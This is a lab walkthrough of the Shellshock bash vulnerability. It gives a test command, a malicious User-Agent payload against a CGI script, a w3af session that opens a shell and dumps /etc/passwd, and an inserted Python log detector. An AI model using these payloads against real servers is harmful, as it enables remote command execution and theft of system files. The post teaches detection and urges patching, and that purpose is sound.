Having fun with Shellshock

Last week CVE-2014-6271, also known as Shellshock, came to the surface: a critical vulnerability that requires no authentication and can easily be exploited remotely. This bash bug brought back memories of Heartbleed, where one of the most widely used pieces of software in the world suffered an easily exploited vulnerability.

The main problem lies with the Bash shell, which is a command processor used in all Unix-like operating systems (Linux, Unix, Mac OS, etc.). Bash parses function definitions stored in environment variables, and a vulnerable version also executes any commands that follow the function body. What’s worse is that the bash shell is used by web applications as well as SSH servers when processing certain commands, and those do set environment variables from untrusted input. The consequence is that any web application that invokes bash, and those are usually CGI scripts written in Perl, Python, or PHP, may be vulnerable to remote code execution. It was confirmed that Apache servers on Linux, for example, using mod_cgi are vulnerable.

Below is one demonstration on an Ubuntu system with a vulnerable bash.

bricked@bricked:~$ bash --version
GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)

The command below shows that this bash is vulnerable: the word “vulnerable” was printed even though the “echo” command was written only inside an environment variable, after a function definition. A bash which is not vulnerable would not have printed it.

bricked@bricked:~$ env x='() { :;}; echo vulnerable' bash -c ":" 2>/dev/null
vulnerable

I have an Apache 2.2 server running on this Ubuntu machine with the following CGI script, named shellshock.cgi.

#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hi"

The code seems harmless. After all, it just prints a short response. But the problem is that it is using bash. And worse, one of the standard HTTP request headers, “User-Agent”, is passed to the script as an environment variable called HTTP_USER_AGENT. Since any client can set the User-Agent header to whatever it likes, with the Shellshock vulnerability commands can be executed simply by setting that header. This can easily be done using wget or curl.

In the case of this vulnerable web server, a proof of concept can be shown simply by executing the following command from another machine that can reach the server. Since this is on an internal network, I’m using an internal IP address. The address of this machine is 192.168.1.102, which means I can reach the page by simply requesting http://192.168.1.102/cgi-bin/shellshock.cgi (shellshock.cgi being the name of the script).

However, before sending the request, I will set the User-Agent header to a value that will make the server run a command. In this case I pick this value:

() { test; }; echo \"Content-type:text/plain\" echo; echo; /bin/ping -c 3 192.168.1.1

Basically, this value defines a dummy function, followed by the echo statements that produce a response header and a blank line, followed by a command that pings the gateway (192.168.1.1). I can replace the ping command with other malicious commands (e.g. /bin/cat /etc/passwd).

Here’s what happens when the User-Agent string is set to the value with the ping command. The server starts pinging the gateway address, as shown in the tcpdump capture.
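From the defender’s side, the same header that carries the payload also lands in the web server’s access log, so probes like the one above can be spotted there. The following Python script is my own added example (not code from the original post or from w3af): it scans Apache combined-format log lines for the exported-function prefix in the User-Agent, Referer or request line. The log lines are constructed samples, and the regexes are my assumptions about the combined format and about the payload prefix.

```python
import re

# Apache "combined" log format: request line, referer and user-agent are the
# quoted fields. A Shellshock probe normally arrives in User-Agent, but any
# header the web server exports into the CGI environment will do.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# An exported bash function starts with "()" then "{" (whitespace optional);
# that prefix is what a vulnerable bash mis-parses, so its presence in a
# client-controlled field is the signature to alert on.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def is_shellshock_probe(value):
    """True if a header or request value carries the function-export prefix."""
    return bool(SHELLSHOCK_RE.search(value))


def scan_access_log(lines):
    """Return one finding per combined-format line carrying the signature:
    source IP, request line, status and which fields matched."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line.strip())
        if not m:
            continue  # not combined format: skip rather than crash
        hits = [f for f in ("agent", "referer", "request")
                if is_shellshock_probe(m.group(f))]
        if hits:
            findings.append({"ip": m.group("ip"),
                             "request": m.group("request"),
                             "status": int(m.group("status")),
                             "fields": hits})
    return findings


# Constructed sample lines (not a real capture); the path and the 192.168.1.x
# addresses mirror the lab described in the post.
SAMPLE_LOG = [
    '192.168.1.50 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/shellshock.cgi HTTP/1.1" 200 3 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/shellshock.cgi HTTP/1.1" 200 3 "-" "() { :;}; echo vulnerable"',
    '192.168.1.77 - - [25/Sep/2014:10:02:30 +0000] "GET /index.html HTTP/1.1" 200 512 "() { test; }; /bin/true" "curl/7.35.0"',
]
```

Apache escapes a literal double quote inside a logged header as \", which the simple `[^"]*` field pattern does not handle; widen the regex if your logs contain such values.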

Andres Riancho added a plugin to w3af that detects a vulnerable web server and exploits it.

root@victim:~/Downloads/w3af# ./w3af_console
Checking if a new version is available in our git repository. Please wait...
An error occurred while updating: "An error occurred while fetching from the remote Git repository! Please update manually using "git pull"."
w3af>>> plugins
w3af/plugins>>> audit shellshock
Unknown plugin: 'shellshock'
w3af/plugins>>> audit shell_shock
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://192.168.1.102/cgi-bin/shellshock.cgi
w3af/config:target>>> back
The configuration has been saved.
w3af>>> start
Shell shock was found at: "http://192.168.1.102/cgi-bin/shellshock.cgi", using HTTP method GET. The modified header was: "User-Agent" and it's value was: "() { :;}; echo "shellshock: check"". This vulnerability was found in the request with id 33.
Scan finished in 1 second.
Stopping the core...

The vulnerability is detected; now it’s time to exploit it:

w3af/exploit>>> exploit os_commanding
os_commanding exploit plugin is starting.
Vulnerability successfully exploited. Generated shell object <os_commanding object (ruser: "www-data" | rsystem: "Linux bricked 3.8.0-29-generic x86_64 GNU/Linux")>
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <os_commanding object (ruser: "www-data" | rsystem: "Linux bricked 3.8.0-29-generic x86_64 GNU/Linux")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the os_commanding shell.
w3af/exploit/os_commanding-0>>> execute /bin/cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:105:114::/nonexistent:/bin/false
avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
saned:x:114:123::/home/saned:/bin/false
bricked:x:1000:1000:bricked,,,:/home/bricked:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:115:125:MySQL Server,,,:/nonexistent:/bin/false
tomcat7:x:116:126::/usr/share/tomcat7:/bin/false
postfix:x:117:127::/var/spool/postfix:/bin/false

I was able to print /etc/passwd!

If you’re running a *nix-like OS, check whether your system is vulnerable. If it is, patch it immediately. Most distros released patches within a day of the vulnerability being disclosed.